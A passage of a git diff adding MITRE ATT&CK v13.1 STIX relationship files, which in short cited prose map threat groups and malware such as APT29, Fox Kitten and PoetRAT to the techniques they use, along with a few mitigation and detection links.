a/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--00c88cab-5cb9-492a-8dce-8eab92213bc3.json b/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--00c88cab-5cb9-492a-8dce-8eab92213bc3.json new file mode 100644 index 0000000000000000000000000000000000000000..83b67a90cf37219c3b84fff1303712c7b5cce088 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--00c88cab-5cb9-492a-8dce-8eab92213bc3.json 
@@ -0,0 +1,30 @@ +{ + "type": "bundle", + "id": "bundle--b88fe80e-9e65-4107-b306-6236bef16358", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--00c88cab-5cb9-492a-8dce-8eab92213bc3", + "type": "relationship", + "created": "2018-01-16T16:13:52.465Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "url": "https://researchcenter.paloaltonetworks.com/2017/10/unit42-oilrig-group-steps-attacks-new-delivery-documents-new-injector-trojan/", + "description": "Falcone, R. and Lee, B. (2017, October 9). OilRig Group Steps Up Attacks with New Delivery Documents and New Injector Trojan. Retrieved January 8, 2018.", + "source_name": "OilRig New Delivery Oct 2017" + } + ], + "modified": "2019-09-04T22:55:41.899Z", + "description": "(Citation: OilRig New Delivery Oct 2017)", + "relationship_type": "uses", + "source_ref": "intrusion-set--4ca1929c-7d64-4aab-b849-badbfc0c760d", + "target_ref": "malware--5be33fef-39c0-4532-84ee-bea31e1b5324", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--00ce5c68-cb85-46d1-a6ba-7b2b767b0f09.json b/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--00ce5c68-cb85-46d1-a6ba-7b2b767b0f09.json new file mode 100644 index 0000000000000000000000000000000000000000..b5a61cfaa1ca7f70f69b61b6f62b1736d7ffb218 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--00ce5c68-cb85-46d1-a6ba-7b2b767b0f09.json 
@@ -0,0 +1,30 @@ +{ + "type": "bundle", + "id": "bundle--da96e4b4-8b36-450f-b582-bc12e30eff43", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--00ce5c68-cb85-46d1-a6ba-7b2b767b0f09", + "type": "relationship", + "created": "2020-08-13T14:58:25.315Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Secureworks Karagany July 2019", + "url": "https://www.secureworks.com/research/updated-karagany-malware-targets-energy-sector", + "description": "Secureworks. (2019, July 24). Updated Karagany Malware Targets Energy Sector. Retrieved August 12, 2020." + } + ], + "modified": "2020-08-13T14:58:25.315Z", + "description": "[Trojan.Karagany](https://attack.mitre.org/software/S0094) can gather information about the user on a compromised host.(Citation: Secureworks Karagany July 2019)", + "relationship_type": "uses", + "source_ref": "malware--82cb34ba-02b5-432b-b2d2-07f55cbf674d", + "target_ref": "attack-pattern--03d7999c-1f4c-42cc-8373-e7690d318104", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--00d1f959-5469-4a9c-b33d-93f315719a6c.json b/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--00d1f959-5469-4a9c-b33d-93f315719a6c.json new file mode 100644 index 0000000000000000000000000000000000000000..1f5a78aaf89fb123f9d24cc4245afe91b4ed5b32 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--00d1f959-5469-4a9c-b33d-93f315719a6c.json 
@@ -0,0 +1,30 @@ +{ + "type": "bundle", + "id": "bundle--ca13909e-a677-47b3-bdba-3bf262565d76", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--00d1f959-5469-4a9c-b33d-93f315719a6c", + "type": "relationship", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "FireEye APT10 Sept 2018", + "description": "Matsuda, A., Muhammad I. (2018, September 13). APT10 Targeting Japanese Corporations Using Updated TTPs. Retrieved September 17, 2018.", + "url": "https://www.fireeye.com/blog/threat-research/2018/09/apt10-targeting-japanese-corporations-using-updated-ttps.html" + } + ], + "modified": "2020-03-17T02:46:42.658Z", + "description": "[UPPERCUT](https://attack.mitre.org/software/S0275) has used HTTP for C2, including sending error codes in Cookie headers.(Citation: FireEye APT10 Sept 2018)", + "relationship_type": "uses", + "source_ref": "malware--fb4e3792-e915-4fdd-a9cd-92dfa2ace7aa", + "target_ref": "attack-pattern--df8b2a25-8bdf-4856-953c-a04372b1c161", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--00d3d6a8-c711-4bb5-bf0a-e17c0ecac8c8.json b/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--00d3d6a8-c711-4bb5-bf0a-e17c0ecac8c8.json new file mode 100644 index 0000000000000000000000000000000000000000..482e524dd73ab2bd7d0f85409edb34458567db70 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--00d3d6a8-c711-4bb5-bf0a-e17c0ecac8c8.json 
@@ -0,0 +1,30 @@ +{ + "type": "bundle", + "id": "bundle--b1612c4d-6668-47dd-b092-2e8699250fb9", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--00d3d6a8-c711-4bb5-bf0a-e17c0ecac8c8", + "type": "relationship", + "created": "2019-01-30T15:19:14.928Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "description": "Yan, T., et al. (2018, November 21). New Wine in Old Bottle: New Azorult Variant Found in FindMyName Campaign using Fallout Exploit Kit. Retrieved November 29, 2018.", + "url": "https://researchcenter.paloaltonetworks.com/2018/11/unit42-new-wine-old-bottle-new-azorult-variant-found-findmyname-campaign-using-fallout-exploit-kit/", + "source_name": "Unit42 Azorult Nov 2018" + } + ], + "modified": "2020-03-16T16:39:52.451Z", + "description": "[Azorult](https://attack.mitre.org/software/S0344) can call WTSQueryUserToken and CreateProcessAsUser to start a new process with local system privileges.(Citation: Unit42 Azorult Nov 2018)", + "relationship_type": "uses", + "source_ref": "malware--f9b05f33-d45d-4e4d-aafe-c208d38a0080", + "target_ref": "attack-pattern--677569f9-a8b0-459e-ab24-7f18091fa7bf", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--00de3cf9-73c4-4b04-a074-a5d73e9b61de.json b/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--00de3cf9-73c4-4b04-a074-a5d73e9b61de.json new file mode 100644 index 0000000000000000000000000000000000000000..cb1f9db05e3ab6c61292e2ff989e8c93de4c1721 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--00de3cf9-73c4-4b04-a074-a5d73e9b61de.json 
@@ -0,0 +1,30 @@ +{ + "type": "bundle", + "id": "bundle--dcebde79-5086-491c-b44f-b9bae18f77d8", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--00de3cf9-73c4-4b04-a074-a5d73e9b61de", + "type": "relationship", + "created": "2020-12-29T19:13:11.251Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "CISA AA20-259A Iran-Based Actor September 2020", + "url": "https://us-cert.cisa.gov/ncas/alerts/aa20-259a", + "description": "CISA. (2020, September 15). Iran-Based Threat Actor Exploits VPN Vulnerabilities. Retrieved December 21, 2020." + } + ], + "modified": "2020-12-29T19:13:11.251Z", + "description": "[Fox Kitten](https://attack.mitre.org/groups/G0117) has downloaded additional tools including [PsExec](https://attack.mitre.org/software/S0029) directly to endpoints.(Citation: CISA AA20-259A Iran-Based Actor September 2020)", + "relationship_type": "uses", + "source_ref": "intrusion-set--c21dd6f1-1364-4a70-a1f7-783080ec34ee", + "target_ref": "attack-pattern--e6919abc-99f9-4c6c-95a5-14761e7b2add", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--00e25bca-7df1-464e-94a4-cc13124e1d0c.json b/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--00e25bca-7df1-464e-94a4-cc13124e1d0c.json new file mode 100644 index 0000000000000000000000000000000000000000..2901ac49537161baf6cc6e9f5f260405f56de9b4 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--00e25bca-7df1-464e-94a4-cc13124e1d0c.json 
@@ -0,0 +1,30 @@ +{ + "type": "bundle", + "id": "bundle--59c459b2-fd13-45cc-b3b0-7df4e2fedb6f", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--00e25bca-7df1-464e-94a4-cc13124e1d0c", + "type": "relationship", + "created": "2020-04-29T18:44:04.814Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Talos PoetRAT April 2020", + "url": "https://blog.talosintelligence.com/2020/04/poetrat-covid-19-lures.html", + "description": "Mercer, W, et al. (2020, April 16). PoetRAT: Python RAT uses COVID-19 lures to target Azerbaijan public and private sectors. Retrieved April 27, 2020." + } + ], + "modified": "2020-04-29T18:44:04.814Z", + "description": "[PoetRAT](https://attack.mitre.org/software/S0428) sent username, computer name, and the previously generated UUID in reply to a \"who\" command from C2.(Citation: Talos PoetRAT April 2020)", + "relationship_type": "uses", + "source_ref": "malware--cc5497f7-a9e8-436f-94da-b2b4a9b9ad3c", + "target_ref": "attack-pattern--03d7999c-1f4c-42cc-8373-e7690d318104", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--00e7784e-d0c8-48d8-a377-7ec83cf6a474.json b/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--00e7784e-d0c8-48d8-a377-7ec83cf6a474.json new file mode 100644 index 0000000000000000000000000000000000000000..deb5e12e2bfad2e1141c5948c4256618a1b9148a --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--00e7784e-d0c8-48d8-a377-7ec83cf6a474.json 
@@ -0,0 +1,38 @@ +{ + "type": "bundle", + "id": "bundle--7e182112-e7fe-4cfb-a70e-0982b1eed0f7", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--00e7784e-d0c8-48d8-a377-7ec83cf6a474", + "created": "2023-03-26T16:19:45.553Z", + "revoked": false, + "external_references": [ + { + "source_name": "Microsoft - Customer Guidance on Recent Nation-State Cyber Attacks", + "description": "MSRC. (2020, December 13). Customer Guidance on Recent Nation-State Cyber Attacks. Retrieved December 30, 2020.", + "url": "https://msrc-blog.microsoft.com/2020/12/13/customer-guidance-on-recent-nation-state-cyber-attacks/" + }, + { + "source_name": "Secureworks IRON RITUAL Profile", + "description": "Secureworks CTU. (n.d.). IRON RITUAL. Retrieved February 24, 2022.", + "url": "https://www.secureworks.com/research/threat-profiles/iron-ritual" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-26T16:19:45.553Z", + "description": "During the [SolarWinds Compromise](https://attack.mitre.org/campaigns/C0024), [APT29](https://attack.mitre.org/groups/G0016) created tokens using compromised SAML signing certificates.(Citation: Microsoft - Customer Guidance on Recent Nation-State Cyber Attacks)(Citation: Secureworks IRON RITUAL Profile)", + "relationship_type": "uses", + "source_ref": "campaign--808d6b30-df4e-4341-8248-724da4bac650", + "target_ref": "attack-pattern--1f9c2bae-b441-4f66-a8af-b65946ee72f2", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file 
diff --git a/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--00e99176-c74e-4f49-a498-c66a71612a5b.json b/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--00e99176-c74e-4f49-a498-c66a71612a5b.json new file mode 100644 index 0000000000000000000000000000000000000000..cf0456b3740caac18d3c60ea7429847c017d6b34 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--00e99176-c74e-4f49-a498-c66a71612a5b.json 
@@ -0,0 +1,38 @@ +{ + "type": "bundle", + "id": "bundle--152ea9a5-b211-4958-8d09-a000b91c2a47", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--00e99176-c74e-4f49-a498-c66a71612a5b", + "created": "2021-04-07T13:57:06.538Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Talos Cobalt Strike September 2020", + "description": "Mavis, N. (2020, September 21). The Art and Science of Detecting Cobalt Strike. Retrieved April 6, 2021.", + "url": "https://talos-intelligence-site.s3.amazonaws.com/production/document_files/files/000/095/031/original/Talos_Cobalt_Strike.pdf" + }, + { + "source_name": "Cobalt Strike Manual 4.3 November 2020", + "description": "Strategic Cyber LLC. (2020, November 5). Cobalt Strike: Advanced Threat Tactics for Penetration Testers. Retrieved April 13, 2021.", + "url": "https://web.archive.org/web/20210708035426/https://www.cobaltstrike.com/downloads/csmanual43.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-11-30T22:37:12.371Z", + "description": "[Cobalt Strike](https://attack.mitre.org/software/S0154) can use self signed Java applets to execute signed applet attacks.(Citation: Talos Cobalt Strike September 2020)(Citation: Cobalt Strike Manual 4.3 November 2020)", + "relationship_type": "uses", + "source_ref": "malware--a7881f21-e978-4fe4-af56-92c9416a2616", + "target_ref": "attack-pattern--32901740-b42c-4fdd-bc02-345b5dc57082", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file 
diff --git a/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--00e9a38d-6dc5-4d67-b2fe-977b1c7d17dd.json b/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--00e9a38d-6dc5-4d67-b2fe-977b1c7d17dd.json new file mode 100644 index 0000000000000000000000000000000000000000..934a626485ee206fa663f671e7ffc7dd1a18b8dd --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--00e9a38d-6dc5-4d67-b2fe-977b1c7d17dd.json 
@@ -0,0 +1,38 @@ +{ + "type": "bundle", + "id": "bundle--bb3ace3a-c486-4a9f-97a9-73600696f332", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--00e9a38d-6dc5-4d67-b2fe-977b1c7d17dd", + "created": "2019-04-12T17:01:01.266Z", + "x_mitre_version": "1.0", + "external_references": [ + { + "source_name": "Novetta Blockbuster Destructive Malware", + "url": "https://web.archive.org/web/20160303200515/https://operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-Destructive-Malware-Report.pdf", + "description": "Novetta Threat Research Group. (2016, February 24). Operation Blockbuster: Destructive Malware Report. Retrieved March 2, 2016." + }, + { + "source_name": "Novetta Blockbuster", + "url": "https://web.archive.org/web/20160226161828/https://www.operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-Report.pdf", + "description": "Novetta Threat Research Group. (2016, February 24). Operation Blockbuster: Unraveling the Long Thread of the Sony Attack. Retrieved February 25, 2016." + } + ], + "x_mitre_deprecated": false, + "revoked": false, + "description": "(Citation: Novetta Blockbuster)(Citation: Novetta Blockbuster Destructive Malware)", + "modified": "2022-07-28T18:55:35.993Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "relationship_type": "uses", + "source_ref": "intrusion-set--c93fccb1-e8e8-42cf-ae33-2ad1d183913a", + "target_ref": "tool--3ffbdc1f-d2bf-41ab-91a2-c7b857e98079", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file 
diff --git a/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--00ed8575-5d79-46c3-adea-d0e1bf5dc14a.json b/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--00ed8575-5d79-46c3-adea-d0e1bf5dc14a.json new file mode 100644 index 0000000000000000000000000000000000000000..1e40020105c0e50dcb3fe45a5b5c3d3dbbeb00df --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--00ed8575-5d79-46c3-adea-d0e1bf5dc14a.json @@ -0,0 +1,30 @@ +{ + "type": "bundle", + "id": "bundle--d010f073-2db0-4a30-93cd-95685efd66f0", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--00ed8575-5d79-46c3-adea-d0e1bf5dc14a", + "type": "relationship", + "created": "2022-01-11T14:58:01.883Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Prevailion DarkWatchman 2021", + "url": "https://www.prevailion.com/darkwatchman-new-fileless-techniques/", + "description": "Smith, S., Stafford, M. (2021, December 14). DarkWatchman: A new evolution in fileless techniques. Retrieved January 10, 2022." + } + ], + "modified": "2022-01-11T16:03:19.390Z", + "description": "[DarkWatchman](https://attack.mitre.org/software/S0673) can identity the OS locale of a compromised host.(Citation: Prevailion DarkWatchman 2021)", + "relationship_type": "uses", + "source_ref": "malware--63686509-069b-4143-99ea-4e59cad6cb2a", + "target_ref": "attack-pattern--c877e33f-1df6-40d6-b1e7-ce70f16f4979", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file 
diff --git a/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--00f4c60b-36c4-4ec5-affd-38f89687d957.json b/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--00f4c60b-36c4-4ec5-affd-38f89687d957.json new file mode 100644 index 0000000000000000000000000000000000000000..f1431aea3c4841b201c80c789fb3d48ccc27c7b0 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--00f4c60b-36c4-4ec5-affd-38f89687d957.json @@ -0,0 +1,30 @@ +{ + "type": "bundle", + "id": "bundle--9ab8ac48-e519-40ad-91e4-a8aea5343cf0", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--00f4c60b-36c4-4ec5-affd-38f89687d957", + "type": "relationship", + "created": "2020-08-11T21:15:35.506Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Unit42 RDAT July 2020", + "url": "https://unit42.paloaltonetworks.com/oilrig-novel-c2-channel-steganography/", + "description": "Falcone, R. (2020, July 22). OilRig Targets Middle Eastern Telecommunications Organization and Adds Novel C2 Channel with Steganography to Its Inventory. Retrieved July 28, 2020." + } + ], + "modified": "2020-09-02T21:40:20.748Z", + "description": "[RDAT](https://attack.mitre.org/software/S0495) can use HTTP communications for C2, as well as using the WinHTTP library to make requests to the Exchange Web Services API.(Citation: Unit42 RDAT July 2020)", + "relationship_type": "uses", + "source_ref": "malware--4b346d12-7f91-48d2-8f06-b26ffa0d825b", + "target_ref": "attack-pattern--df8b2a25-8bdf-4856-953c-a04372b1c161", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file 
diff --git a/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--00f95333-8677-4c6c-9f67-c8ebf0fcf607.json b/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--00f95333-8677-4c6c-9f67-c8ebf0fcf607.json new file mode 100644 index 0000000000000000000000000000000000000000..7c959919e47f1be45eb687e17510970109d02bec --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--00f95333-8677-4c6c-9f67-c8ebf0fcf607.json @@ -0,0 +1,30 @@ +{ + "type": "bundle", + "id": "bundle--2292ec93-d40a-4265-afb5-4a155b67911d", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--00f95333-8677-4c6c-9f67-c8ebf0fcf607", + "type": "relationship", + "created": "2020-10-19T16:48:08.533Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "NIST 800-63-3", + "url": "https://pages.nist.gov/800-63-3/sp800-63b.html", + "description": "Grassi, P., et al. (2017, December 1). SP 800-63-3, Digital Identity Guidelines. Retrieved January 16, 2019." + } + ], + "modified": "2020-10-21T01:45:59.183Z", + "description": "Refer to NIST guidelines when creating password policies. (Citation: NIST 800-63-3)", + "relationship_type": "mitigates", + "source_ref": "course-of-action--90c218c3-fbf8-4830-98a7-e8cfb7eaa485", + "target_ref": "attack-pattern--4ffc1794-ec3b-45be-9e52-42dbcb2af2de", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--00fa545f-2333-4ae8-8f59-3fbb56e68d43.json b/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--00fa545f-2333-4ae8-8f59-3fbb56e68d43.json new file mode 100644 index 0000000000000000000000000000000000000000..d6d43d3f7ae39396859ba2410dda9f853d67f225 --- /dev/null 
+++ b/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--00fa545f-2333-4ae8-8f59-3fbb56e68d43.json @@ -0,0 +1,26 @@ +{ + "type": "bundle", + "id": "bundle--e35ebd61-84d4-4260-89d3-9cf7a919155f", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--00fa545f-2333-4ae8-8f59-3fbb56e68d43", + "created": "2022-03-30T14:26:51.836Z", + "x_mitre_version": "0.1", + "x_mitre_deprecated": false, + "revoked": false, + "description": "This may be a difficult technique to detect because adversary traffic may be masked by normal user traffic. Monitor for [Process Injection](https://attack.mitre.org/techniques/T1055) against browser applications.", + "modified": "2022-04-19T23:58:54.229Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--d5fca4e4-e47a-487b-873f-3d22f8865e96", + "target_ref": "attack-pattern--544b0346-29ad-41e1-a808-501bb4193f47", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--00fb61de-33f5-4e85-aca3-8e4016aa0bf8.json b/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--00fb61de-33f5-4e85-aca3-8e4016aa0bf8.json new file mode 100644 index 0000000000000000000000000000000000000000..72d974940f88d5df09f3ac985d50658ea7b8008f --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--00fb61de-33f5-4e85-aca3-8e4016aa0bf8.json 
@@ -0,0 +1,30 @@ +{ + "type": "bundle", + "id": "bundle--a9ce9f6d-fb52-41a5-826d-ef9fac25c47e", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--00fb61de-33f5-4e85-aca3-8e4016aa0bf8", + "type": "relationship", + "created": "2020-12-29T20:23:05.296Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "ClearSky Pay2Kitten December 2020", + "url": "https://www.clearskysec.com/wp-content/uploads/2020/12/Pay2Kitten.pdf", + "description": "ClearSky. (2020, December 17). Pay2Key Ransomware \u2013 A New Campaign by Fox Kitten. Retrieved December 21, 2020." + } + ], + "modified": "2021-04-12T19:34:40.099Z", + "description": "[Fox Kitten](https://attack.mitre.org/groups/G0117) has used a Perl reverse shell to communicate with C2.(Citation: ClearSky Pay2Kitten December 2020)", + "relationship_type": "uses", + "source_ref": "intrusion-set--c21dd6f1-1364-4a70-a1f7-783080ec34ee", + "target_ref": "attack-pattern--7385dfaf-6886-4229-9ecd-6fd678040830", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--00fd8c87-da99-42b3-a792-0d224732c84a.json b/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--00fd8c87-da99-42b3-a792-0d224732c84a.json new file mode 100644 index 0000000000000000000000000000000000000000..accc3e8a69fe93879d4c499f696de7a0126d3a51 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--00fd8c87-da99-42b3-a792-0d224732c84a.json 
@@ -0,0 +1,30 @@ +{ + "type": "bundle", + "id": "bundle--42616edc-0c9a-44b6-9e60-053f60ff911f", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--00fd8c87-da99-42b3-a792-0d224732c84a", + "type": "relationship", + "created": "2022-02-02T15:55:21.760Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Kaspersky WIRTE November 2021", + "url": "https://securelist.com/wirtes-campaign-in-the-middle-east-living-off-the-land-since-at-least-2019/105044", + "description": "Yamout, M. (2021, November 29). WIRTE\u2019s campaign in the Middle East \u2018living off the land\u2019 since at least 2019. Retrieved February 1, 2022." + } + ], + "modified": "2022-02-02T15:55:21.760Z", + "description": "(Citation: Kaspersky WIRTE November 2021)", + "relationship_type": "uses", + "source_ref": "intrusion-set--f8cb7b36-62ef-4488-8a6d-a7033e3271c1", + "target_ref": "malware--9020f5c7-efde-4125-a4f1-1b70f1274ddd", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--00fe17bc-f783-4cba-9171-e1fde2fa0efa.json b/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--00fe17bc-f783-4cba-9171-e1fde2fa0efa.json new file mode 100644 index 0000000000000000000000000000000000000000..7582e74d7857e0e88b6e2ee373b8cb8a8a72afe7 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--00fe17bc-f783-4cba-9171-e1fde2fa0efa.json 
@@ -0,0 +1,33 @@ +{ + "type": "bundle", + "id": "bundle--10b44f10-9d66-4e6a-90f0-2b9b6ab07279", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--00fe17bc-f783-4cba-9171-e1fde2fa0efa", + "created": "2023-03-26T21:11:13.777Z", + "revoked": false, + "external_references": [ + { + "source_name": "CrowdStrike StellarParticle January 2022", + "description": "CrowdStrike. (2022, January 27). Early Bird Catches the Wormhole: Observations from the StellarParticle Campaign. Retrieved February 7, 2022.", + "url": "https://www.crowdstrike.com/blog/observations-from-the-stellarparticle-campaign/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-26T21:11:13.777Z", + "description": "During the [SolarWinds Compromise](https://attack.mitre.org/campaigns/C0024), [APT29](https://attack.mitre.org/groups/G0016) 